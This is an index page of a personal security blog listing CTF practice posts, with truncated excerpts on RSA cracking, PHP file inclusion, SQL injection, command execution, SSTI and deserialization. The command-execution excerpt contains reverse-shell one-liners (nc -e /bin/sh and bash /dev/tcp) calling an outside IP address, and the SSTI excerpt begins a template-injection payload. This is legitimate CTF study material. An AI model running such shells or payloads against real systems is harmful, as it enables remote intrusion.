Wking's Blog

2023-01-15

RSA 加密体制破译

course

题目摘要赛题名称： RSA 加密体制破译赛题描述RSA密码算法是使用最为广泛的公钥密码体制。该体制简单且易于实现，只需要选择5个参数即可（两个素数$𝑝$和$𝑞$、模数$𝑁=𝑝𝑞$、加密指数$𝑒$和解密指数$𝑑$。设𝑚为待加密

2022-10-12

Hello World

For encrypted articles, please contact the author for a key

2022-02-12

CTFShow-文件包含

基础知识详见：web基础漏洞 web80-81<?php if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php",

2022-02-08

BUUCTF_php

BUUCTF

一、[BJDCTF2020]ZJCTF，不过如此知识点：php伪协议、preg_replace与代码执行<?php $text = $_GET["text"]; $file = $_GET["file"]; if(isset($tex

2022-02-04

BUUCTF_SQL注入类

BUUCTF

一、HardSQL知识点：报错注入tips：在发现空格，=号，union关键词被强屏蔽了后，可以尝试报错注入绕过技巧可以看sql总结这也是头一次尝试用报错注入解题 0x7e就是~,方便观看直接上解题步骤： 1.爆表?username=

2022-01-15

CTFShow-命令执行

一、知识点nc 124.223.44.100 12345 -e /bin/sh bash -i >& /dev/tcp/124.223.44.100/6666 0>&1 bash -c "bash -i >& /de

2022-01-09

Node_js

Nodejs

以题代练，了解JS相关漏洞和特性一些特性：https://xz.aliyun.com/t/7752#toc-0 一、特性总结prototype(原型)几乎js的所有对象都是Object的实例，我们没办法使用class自写一个类。js中只剩

2022-01-01

SSTI

根据习题来记录常见的payload 一、CTFShowweb361、362{{''.__class__.__mro__[1].__subclasses__()[132].__init__.__globals__['po

2021-12-28

反序列化

一、反序列POC1.魔术方法 __construct 当对象创建（new）时会自动调用。但在 unserialize() 时是不会自动调用的。 __destruct 当一个对象销毁（反序列化）时被调用 __sleep() 在一个

2021-11-28

title: CTFShow——PHP特性date: 2021-11-28 20:10:32tags: [php相关]categories: CTFshow 相关函数特性 1.intval() <?php echo intval(4